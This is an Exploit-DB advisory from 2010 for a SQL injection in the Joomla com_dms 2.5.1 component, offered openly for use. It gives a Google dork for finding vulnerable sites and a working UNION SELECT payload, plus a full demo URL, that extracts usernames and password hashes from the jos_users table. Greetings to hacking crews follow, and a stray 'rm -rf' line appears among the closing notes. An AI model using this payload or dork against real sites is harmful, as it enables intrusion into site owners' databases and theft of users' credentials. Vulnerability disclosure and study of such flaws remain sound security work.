Joomla! Component com_dms 2.5.1 - SQL Injection

EDB-ID:

11289


Author:

kaMtiEz

Type:

webapps


Platform:

PHP

Date:

2010-01-30


/**************************************************************************

[~] Joomla Component com_dms Remote SQL injection vulnerability - (category_id)
[~] Author	: kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage	: http://www.indonesiancoder.com
[~] Date	: 28 January, 2010


**************************************************************************/

[ Software Information ]

[+] Vendor : http://joomdonation.com/
[+] Info : http://joomdonation.com/index.php?option=com_content&view=article&id=41&Itemid=40
[+] version : 2.5.1 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_dms"
[+] Type : commercial
===========================================================================

[ Vulnerable File ]

http://server/index.php?option=com_dms&task=view_category&category_id=[INDONESIANCODER]

[ Exploit ]

-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--

[ Demo ]

http://server/index.php?option=com_dms&task=view_category&category_id=-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--
===========================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ] 

[+] Babe enyak adek i love u pull dah .. 
[+] Bercinta Sekuat Tenaga !
[+] rm -rf 

[ QUOTE ]

[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..